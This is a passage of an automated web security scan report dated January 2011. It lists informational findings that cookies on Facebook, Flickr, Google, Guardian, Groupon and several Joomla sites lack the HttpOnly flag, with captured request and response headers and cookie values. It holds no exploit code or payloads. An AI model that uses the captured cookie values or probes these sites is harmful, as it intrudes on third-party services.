Path:	/pages/Traverse-City-MI/CloudAccessnet/116931806748

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

lsd=NxhiV; path=/; domain=.facebook.com

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /pages/Traverse-City-MI/CloudAccessnet/116931806748 HTTP/1.1
Host: www.facebook.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: datr=ac4nTYEA6yNv1vkgFgkPGkCj; campaign_click_url=%2Fcampaign%2Fimpression.php%3Fcampaign_id%3D137675572948107%26partner_id%3Dla2day.com%26placement%3Dlike_box%26extra_1%3Dhttp%253A%252F%252Fwww.la2day.com%252F%26extra_2%3DUS;

Response

HTTP/1.1 301 Moved Permanently
Cache-Control: private, no-cache, no-store, must-revalidate
Expires: Sat, 01 Jan 2000 00:00:00 GMT
Location: http://www.facebook.com/pages/CloudAccessnet/116931806748
P3P: CP="Facebook does not have a P3P policy. Learn why here: http://fb.me/p3p"
Pragma: no-cache
Set-Cookie: lsd=NxhiV; path=/; domain=.facebook.com
Content-Type: text/html; charset=utf-8
Connection: close
Date: Mon, 24 Jan 2011 16:05:06 GMT
Content-Length: 0

14.741. http://www.facebook.com/paty.kfoury previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.facebook.com
Path:	/paty.kfoury

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:

lsd=qOxUt; path=/; domain=.facebook.com
reg_fb_gate=http%3A%2F%2Fwww.facebook.com%2Fpaty.kfoury; path=/; domain=.facebook.com
reg_fb_ref=http%3A%2F%2Fwww.facebook.com%2Fpaty.kfoury; path=/; domain=.facebook.com

The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

Response

14.742. http://www.facebook.com/profile.php previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.facebook.com
Path:	/profile.php

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:

lsd=1Nf86; path=/; domain=.facebook.com
reg_fb_gate=http%3A%2F%2Fwww.facebook.com%2Fprofile.php%3Fid%3D836605415; path=/; domain=.facebook.com
reg_fb_ref=http%3A%2F%2Fwww.facebook.com%2Fprofile.php%3Fid%3D836605415; path=/; domain=.facebook.com

The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

Response

14.743. http://www.facebook.com/sharer.php previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.facebook.com
Path:	/sharer.php

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:

lsd=2yleE; path=/; domain=.facebook.com
reg_fb_gate=http%3A%2F%2Fwww.facebook.com%2Fsharer.php; path=/; domain=.facebook.com
reg_fb_ref=http%3A%2F%2Fwww.facebook.com%2Fsharer.php; path=/; domain=.facebook.com

The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

Response

14.744. http://www.flickr.com/photos/aubalumni/4688630122/x22 previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.flickr.com
Path:	/photos/aubalumni/4688630122/x22

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:

BX=cvj761d6jr9eq&b=3&s=q9; expires=Tue, 02-Jun-2037 20:00:00 GMT; path=/; domain=.flickr.com
localization=en-us%3Bus%3Bus; expires=Thu, 23-Jan-2014 16:16:26 GMT; path=/; domain=.flickr.com
cookie_l10n=deleted; expires=Sun, 24-Jan-2010 16:16:25 GMT; path=/; domain=flickr.com
cookie_intl=deleted; expires=Sun, 24-Jan-2010 16:16:25 GMT; path=/; domain=flickr.com

The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /photos/aubalumni/4688630122/x22 HTTP/1.1
Host: www.flickr.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

14.745. http://www.flickr.com/photos/favoritltd/4795390303/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.flickr.com
Path:	/photos/favoritltd/4795390303/

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:

localization=en-us%3Bus%3Bus; expires=Fri, 24-Jan-2014 13:12:12 GMT; path=/; domain=.flickr.com
cookie_l10n=deleted; expires=Mon, 25-Jan-2010 13:12:11 GMT; path=/; domain=flickr.com
cookie_intl=deleted; expires=Mon, 25-Jan-2010 13:12:11 GMT; path=/; domain=flickr.com
fldetectedlang=en-us; expires=Sat, 26-Mar-2011 13:12:12 GMT; path=/; domain=.flickr.com

The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

Response

14.746. http://www.flickr.com/photos/favoritltd/4795390991/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.flickr.com
Path:	/photos/favoritltd/4795390991/

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:

localization=en-us%3Bus%3Bus; expires=Fri, 24-Jan-2014 13:12:10 GMT; path=/; domain=.flickr.com
cookie_l10n=deleted; expires=Mon, 25-Jan-2010 13:12:09 GMT; path=/; domain=flickr.com
cookie_intl=deleted; expires=Mon, 25-Jan-2010 13:12:09 GMT; path=/; domain=flickr.com
fldetectedlang=en-us; expires=Sat, 26-Mar-2011 13:12:11 GMT; path=/; domain=.flickr.com

The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

Response

14.747. http://www.flickr.com/photos/favoritltd/4795392149/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.flickr.com
Path:	/photos/favoritltd/4795392149/

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:

localization=en-us%3Bus%3Bus; expires=Fri, 24-Jan-2014 13:11:48 GMT; path=/; domain=.flickr.com
cookie_l10n=deleted; expires=Mon, 25-Jan-2010 13:11:47 GMT; path=/; domain=flickr.com
cookie_intl=deleted; expires=Mon, 25-Jan-2010 13:11:47 GMT; path=/; domain=flickr.com
fldetectedlang=en-us; expires=Sat, 26-Mar-2011 13:11:48 GMT; path=/; domain=.flickr.com

The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

Response

14.748. http://www.flickr.com/photos/favoritltd/4795392811/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.flickr.com
Path:	/photos/favoritltd/4795392811/

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:

localization=en-us%3Bus%3Bus; expires=Fri, 24-Jan-2014 13:11:45 GMT; path=/; domain=.flickr.com
cookie_l10n=deleted; expires=Mon, 25-Jan-2010 13:11:44 GMT; path=/; domain=flickr.com
cookie_intl=deleted; expires=Mon, 25-Jan-2010 13:11:44 GMT; path=/; domain=flickr.com
fldetectedlang=en-us; expires=Sat, 26-Mar-2011 13:11:45 GMT; path=/; domain=.flickr.com

The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

Response

14.749. http://www.flickr.com/photos/favoritltd/4796022554/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.flickr.com
Path:	/photos/favoritltd/4796022554/

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:

localization=en-us%3Bus%3Bus; expires=Fri, 24-Jan-2014 13:12:29 GMT; path=/; domain=.flickr.com
cookie_l10n=deleted; expires=Mon, 25-Jan-2010 13:12:28 GMT; path=/; domain=flickr.com
cookie_intl=deleted; expires=Mon, 25-Jan-2010 13:12:28 GMT; path=/; domain=flickr.com
fldetectedlang=en-us; expires=Sat, 26-Mar-2011 13:12:29 GMT; path=/; domain=.flickr.com

The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

Response

14.750. http://www.flickr.com/photos/favoritltd/4796024690/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.flickr.com
Path:	/photos/favoritltd/4796024690/

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:

localization=en-us%3Bus%3Bus; expires=Fri, 24-Jan-2014 13:11:55 GMT; path=/; domain=.flickr.com
cookie_l10n=deleted; expires=Mon, 25-Jan-2010 13:11:54 GMT; path=/; domain=flickr.com
cookie_intl=deleted; expires=Mon, 25-Jan-2010 13:11:54 GMT; path=/; domain=flickr.com
fldetectedlang=en-us; expires=Sat, 26-Mar-2011 13:11:55 GMT; path=/; domain=.flickr.com

The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

Response

14.751. http://www.google.com/calendar/embed previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.google.com
Path:	/calendar/embed

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

S=calendar=PGTAzruPpZC0T4p7k1s-Zg;Expires=Tue, 24-Jan-2012 16:39:42 GMT

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /calendar/embed HTTP/1.1
Host: www.google.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=173272373.1294766927.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=173272373.1871872.1294766927.1294766927.1294766927.1; PREF=ID=11a9f75446a95c33:U=f6f0157cbdaf97f8:FF=0:TM=1293845297:LM=1295377703:GM=1:S=8wu8JKm_kVjmCdUt; NID=42=TKkfn6Tg7OKIy4aZoe4v6m5-9eWtGaicWAxOp0ReoP7haXOs4wVSbY3dIWgiz04r_L-gfyIMSiYfCfw16ffNlM8YVHvy9fcgoDr9uWOPODsh-QzrVXD7T9MKFCea-X0V;

Response

HTTP/1.1 302 Moved Temporarily
Set-Cookie: S=calendar=PGTAzruPpZC0T4p7k1s-Zg;Expires=Tue, 24-Jan-2012 16:39:42 GMT
Location: https://www.google.com/calendar/embed?gsessionid=OK
Content-Type: text/html; charset=UTF-8
Date: Mon, 24 Jan 2011 16:39:42 GMT
Expires: Mon, 24 Jan 2011 16:39:42 GMT
Cache-Control: private, max-age=0
X-Content-Type-Options: nosniff
X-Frame-Options: SAMEORIGIN
X-XSS-Protection: 1; mode=block
Server: GSE
Connection: close

<HTML>
<HEAD>
<TITLE>Moved Temporarily</TITLE>
</HEAD>
<BODY BGCOLOR="#FFFFFF" TEXT="#000000">
<H1>Moved Temporarily</H1>
The document has moved <A HREF="https://www.google.com/calendar/embed?gsession
...[SNIP]...

14.752. http://www.google.com/calendar/event previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.google.com
Path:	/calendar/event

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

S=calendar=2FKjWxdqCI7F35QmTmNAaA;Expires=Tue, 24-Jan-2012 16:39:44 GMT

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /calendar/event?eid=NjY3N2VndjJhM24xbDE0NDQ5cDJ0ZXNwc29fMjAwOTA1MTlUMTgwMDAwWiBqdWdjYWxlbmRhckBvcGVuc291cmNlbWF0dGVycy5vcmc HTTP/1.1
Host: www.google.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=173272373.1294766927.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=173272373.1871872.1294766927.1294766927.1294766927.1; PREF=ID=11a9f75446a95c33:U=f6f0157cbdaf97f8:FF=0:TM=1293845297:LM=1295377703:GM=1:S=8wu8JKm_kVjmCdUt; NID=42=TKkfn6Tg7OKIy4aZoe4v6m5-9eWtGaicWAxOp0ReoP7haXOs4wVSbY3dIWgiz04r_L-gfyIMSiYfCfw16ffNlM8YVHvy9fcgoDr9uWOPODsh-QzrVXD7T9MKFCea-X0V;

Response

HTTP/1.1 302 Moved Temporarily
Set-Cookie: S=calendar=2FKjWxdqCI7F35QmTmNAaA;Expires=Tue, 24-Jan-2012 16:39:44 GMT
Location: https://www.google.com/calendar/event?eid=NjY3N2VndjJhM24xbDE0NDQ5cDJ0ZXNwc29fMjAwOTA1MTlUMTgwMDAwWiBqdWdjYWxlbmRhckBvcGVuc291cmNlbWF0dGVycy5vcmc&gsessionid=OK
Content-Type: text/html; charset=UTF-8
Date: Mon, 24 Jan 2011 16:39:44 GMT
Expires: Mon, 24 Jan 2011 16:39:44 GMT
Cache-Control: private, max-age=0
X-Content-Type-Options: nosniff
X-Frame-Options: SAMEORIGIN
X-XSS-Protection: 1; mode=block
Server: GSE
Connection: close

<HTML>
<HEAD>
<TITLE>Moved Temporarily</TITLE>
</HEAD>
<BODY BGCOLOR="#FFFFFF" TEXT="#000000">
<H1>Moved Temporarily</H1>
The document has moved <A HREF="https://www.google.com/calendar/event?eid=NjY3
...[SNIP]...

14.753. http://www.google.com/finance previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.google.com
Path:	/finance

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

SC=RV=:ED=us; expires=Sun, 17-Jan-2038 19:14:07 GMT; path=/finance; domain=.google.com

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

Response

14.754. http://www.google.com/setprefs previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.google.com
Path:	/setprefs

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

PREF=ID=11a9f75446a95c33:U=f6f0157cbdaf97f8:FF=0:LD=en:TM=1293845297:LM=1295887187:GM=1:SG=2:S=vEi-6deBjxzySk34; expires=Wed, 23-Jan-2013 16:39:47 GMT; path=/; domain=.google.com

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

Response

14.755. http://www.google.com/url previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.google.com
Path:	/url

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

PREF=ID=11a9f75446a95c33:U=f6f0157cbdaf97f8:FF=0:TM=1293845297:LM=1295887203:GM=1:IG=3:S=iMFWRuisrzY4aBh2; expires=Wed, 23-Jan-2013 16:40:03 GMT; path=/; domain=.google.com

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

Response

14.756. https://www.google.com/accounts/Login previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	https://www.google.com
Path:	/accounts/Login

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

GALX=adTYhQttweA;Path=/accounts;Secure

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /accounts/Login HTTP/1.1
Host: www.google.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=173272373.1294766927.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=173272373.1871872.1294766927.1294766927.1294766927.1; PREF=ID=11a9f75446a95c33:U=f6f0157cbdaf97f8:FF=0:TM=1293845297:LM=1295377703:GM=1:S=8wu8JKm_kVjmCdUt; NID=42=TKkfn6Tg7OKIy4aZoe4v6m5-9eWtGaicWAxOp0ReoP7haXOs4wVSbY3dIWgiz04r_L-gfyIMSiYfCfw16ffNlM8YVHvy9fcgoDr9uWOPODsh-QzrVXD7T9MKFCea-X0V;

Response

14.757. https://www.google.com/accounts/ServiceLogin previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	https://www.google.com
Path:	/accounts/ServiceLogin

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

GALX=UyGwfUaxON0;Path=/accounts;Secure

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /accounts/ServiceLogin HTTP/1.1
Host: www.google.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=173272373.1294766927.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=173272373.1871872.1294766927.1294766927.1294766927.1; PREF=ID=11a9f75446a95c33:U=f6f0157cbdaf97f8:FF=0:TM=1293845297:LM=1295377703:GM=1:S=8wu8JKm_kVjmCdUt; NID=42=TKkfn6Tg7OKIy4aZoe4v6m5-9eWtGaicWAxOp0ReoP7haXOs4wVSbY3dIWgiz04r_L-gfyIMSiYfCfw16ffNlM8YVHvy9fcgoDr9uWOPODsh-QzrVXD7T9MKFCea-X0V;

Response

14.758. http://www.goozernation.com/video-games/index.php/news/351-video-games-qcreate-mental-health-problemsq previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.goozernation.com
Path:	/video-games/index.php/news/351-video-games-qcreate-mental-health-problemsq

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

75a2a69c945fc9bbaf3897f5bc47b14f=dp2ff9jkt3mlta9rvo5qn02g00; path=/

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /video-games/index.php/news/351-video-games-qcreate-mental-health-problemsq HTTP/1.1
Host: www.goozernation.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

14.759. http://www.greenmaven.com/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.greenmaven.com
Path:	/

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

979fda0e3f6e7c8e8a6a222280b2695d=bfb4s1od493fairspf4tr05d04; path=/

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET / HTTP/1.1
Host: www.greenmaven.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Mon, 24 Jan 2011 16:45:08 GMT
Server: Apache/1.3.41 (Unix) mod_fastcgi/2.4.2 mod_scgi/1.12 PHP/5.2.14 mod_psoft_traffic/0.2 mod_ssl/2.8.31 OpenSSL/0.9.8b mod_macro/1.1.2
X-Powered-By: PHP/5.2.14
Set-Cookie: 979fda0e3f6e7c8e8a6a222280b2695d=bfb4s1od493fairspf4tr05d04; path=/
P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM"
Expires: Mon, 1 Jan 2001 00:00:00 GMT
Last-Modified: Mon, 24 Jan 2011 16:45:09 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 44572

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en-gb" lang="en-gb" dir="
...[SNIP]...

14.760. http://www.groupon.com/washington-dc/subscribe previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.groupon.com
Path:	/washington-dc/subscribe

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:

_tpaid=Google; domain=.groupon.com; path=/; expires=Tue, 01-Feb-2011 04:41:06 GMT
adchemy_id=Explorer; path=/
_tpcid=Explorer; domain=.groupon.com; path=/; expires=Tue, 01-Feb-2011 04:41:06 GMT
division=washington-dc; path=/; expires=Fri, 25-Feb-2011 04:41:06 GMT
area=dc-metro; path=/; expires=Fri, 25-Feb-2011 04:41:06 GMT
b=525bb898-283d-11e0-a3b5-005056957e9b; path=/; expires=Mon, 25-Jan-2021 04:41:06 GMT
s=525bc5ae-283d-11e0-a3b5-005056957e9b; path=/
opt_default=7980234323; path=/; expires=Fri, 25-Jan-2013 04:41:06 GMT

The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

Response

14.761. http://www.guardian.co.uk/media/2011/jan/24/amazon-lovefilm-deal-films/x22 previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.guardian.co.uk
Path:	/media/2011/jan/24/amazon-lovefilm-deal-films/x22

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:

GU_MU=VFQyc2xncjZER1lBQUJLMGhWRUFBQURPfDRITzhrOE5rMFFuWjR0VzZTc2w4T3c9PQ==; path=/; domain=.guardian.co.uk; expires=Thu, 21-Jan-2021 16:45:10 GMT
GU_LOCATION=dXNhOjU6Zmw6NDpob2xseXdvb2Q6NDo1Mjg6YnJvYWRiYW5kOiAyNi4wNDg6LTgwLjEyNUAxNjUyMzAyMjA5OTIyMDEyMjc5MjUzMjQyMTgxNDM4NTIzOTEyMDU4NDU=; path=/; domain=.guardian.co.uk; expires=Mon, 14-Feb-2011 16:45:10 GMT

The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

Response

14.762. http://www.guardian.co.uk/media/2011/jan/24/amazon-lovefilm-deal-films/x26amp previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.guardian.co.uk
Path:	/media/2011/jan/24/amazon-lovefilm-deal-films/x26amp

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:

GU_MU=VFQyc2xRcjdERGtBQUJLenJTa0FBQUFhfElYV0o2UkFvL21wbDQ3R2hEWDJ0R2c9PQ==; path=/; domain=.guardian.co.uk; expires=Thu, 21-Jan-2021 16:45:09 GMT
GU_LOCATION=dXNhOjU6Zmw6NDpob2xseXdvb2Q6NDo1Mjg6YnJvYWRiYW5kOiAyNi4wNDg6LTgwLjEyNUAxNjEyOTYyMTg1OTMxNDExNDAzMjk3MTEyMDIxMDkyNzIzOTg3NTQ=; path=/; domain=.guardian.co.uk; expires=Mon, 14-Feb-2011 16:45:09 GMT

The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

Response

14.763. http://www.guardian.co.uk/media/2011/jan/24/amazon-lovefilm-deal-films/x26source/x3duniv/x26sa/x3dX/x26ei/x3dh5I9TauLMMK88gazprSzCg/x26sqi/x3d2/x26ved/x3d0CHcQtgowCg/x22/x3eShared previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.guardian.co.uk
Path:	/media/2011/jan/24/amazon-lovefilm-deal-films/x26source/x3duniv/x26sa/x3dX/x26ei/x3dh5I9TauLMMK88gazprSzCg/x26sqi/x3d2/x26ved/x3d0CHcQtgowCg/x22/x3eShared

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:

GU_MU=VFQyc21BcjdERGtBQUJLenJaZ0FBQUF2fGoxRDF3NkVwdXoyRzRZSm85RTN1Q1E9PQ==; path=/; domain=.guardian.co.uk; expires=Thu, 21-Jan-2021 16:45:12 GMT
GU_LOCATION=dXNhOjU6Zmw6NDpob2xseXdvb2Q6NDo1Mjg6YnJvYWRiYW5kOiAyNi4wNDg6LTgwLjEyNUAxNjUyMzAyMjA5OTIyMDEyMjc5MjUzMjQyMTgxNDM4NTIzOTEyMDU4NDU=; path=/; domain=.guardian.co.uk; expires=Mon, 14-Feb-2011 16:45:12 GMT

The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

Response

14.764. http://www.id-joomla.com/berita-joomla/648-joomla-16-telah-datang previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.id-joomla.com
Path:	/berita-joomla/648-joomla-16-telah-datang

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

49291818acdf6a0853370bd89db83d1e=s0aevrt4jrilpgl4pva0tih570; path=/

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /berita-joomla/648-joomla-16-telah-datang HTTP/1.1
Host: www.id-joomla.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

14.765. http://www.jgerman.de/news/projekt/joomla-16-ist-fertig.html previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.jgerman.de
Path:	/news/projekt/joomla-16-ist-fertig.html

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

1d57acaeed6d03414d456a7cab9b5e05=ve36hni7tqkcjanm1ea6nul5kasiunjn; path=/

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /news/projekt/joomla-16-ist-fertig.html HTTP/1.1
Host: www.jgerman.de
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Mon, 24 Jan 2011 16:01:25 GMT
Server: HTTPD
P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM"
Expires: Mon, 1 Jan 2001 00:00:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: 1d57acaeed6d03414d456a7cab9b5e05=ve36hni7tqkcjanm1ea6nul5kasiunjn; path=/
Last-Modified: Mon, 24 Jan 2011 16:01:27 GMT
Cache-Control: max-age=33135480, public
Vary: Accept-Encoding
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 28139

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="de-de" lang="de-de" dir="
...[SNIP]...

14.766. http://www.jobalot.com/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.jobalot.com
Path:	/

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

CAKEPHP=aa3f49188b2ff5e884e64b9583b43ed3; expires=Fri, 25-Jan-2036 06:03:33 GMT; path=/; domain=.jobalot.com

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET / HTTP/1.1
Host: www.jobalot.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

14.767. http://www.joomla-serbia.com/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.joomla-serbia.com
Path:	/

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

917e8d5468e5e337c185e281d4187e98=03qc1as1mst2j6bva2la4dfq87; path=/

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET / HTTP/1.1
Host: www.joomla-serbia.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Set-Cookie: 917e8d5468e5e337c185e281d4187e98=03qc1as1mst2j6bva2la4dfq87; path=/
P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM"
Content-Type: text/html; charset=utf-8
Expires: Mon, 1 Jan 2001 00:00:00 GMT
Last-Modified: Mon, 24 Jan 2011 16:01:19 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Connection: close
Date: Mon, 24 Jan 2011 16:01:19 GMT
Server: DCLXVI
Content-Length: 21055

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml"
xml:lang="sr-yu"
lang="sr-yu"
...[SNIP]...

14.768. http://www.joomla.cat/notes-mainmenu-2/1-darreres/2083-el-joomla-16-ja-es-aqui previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.joomla.cat
Path:	/notes-mainmenu-2/1-darreres/2083-el-joomla-16-ja-es-aqui

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

9314da27e21679ef814c2e3616267759=aggn177rv95albeviplr0a2it1; path=/

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /notes-mainmenu-2/1-darreres/2083-el-joomla-16-ja-es-aqui HTTP/1.1
Host: www.joomla.cat
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Mon, 24 Jan 2011 16:13:10 GMT
Server: Apache/2.2.3 (CentOS)
X-Powered-By: PHP/5.2.14
P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM"
Expires: Mon, 1 Jan 2001 00:00:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: 9314da27e21679ef814c2e3616267759=aggn177rv95albeviplr0a2it1; path=/
Last-Modified: Mon, 24 Jan 2011 16:13:10 GMT
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 16937

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="ca-es" lang="ca-es" >
...[SNIP]...

14.769. http://www.joomla.fr/les-news-joomla/13-news-officielles/1032-joomla-1-6 previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.joomla.fr
Path:	/les-news-joomla/13-news-officielles/1032-joomla-1-6

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:

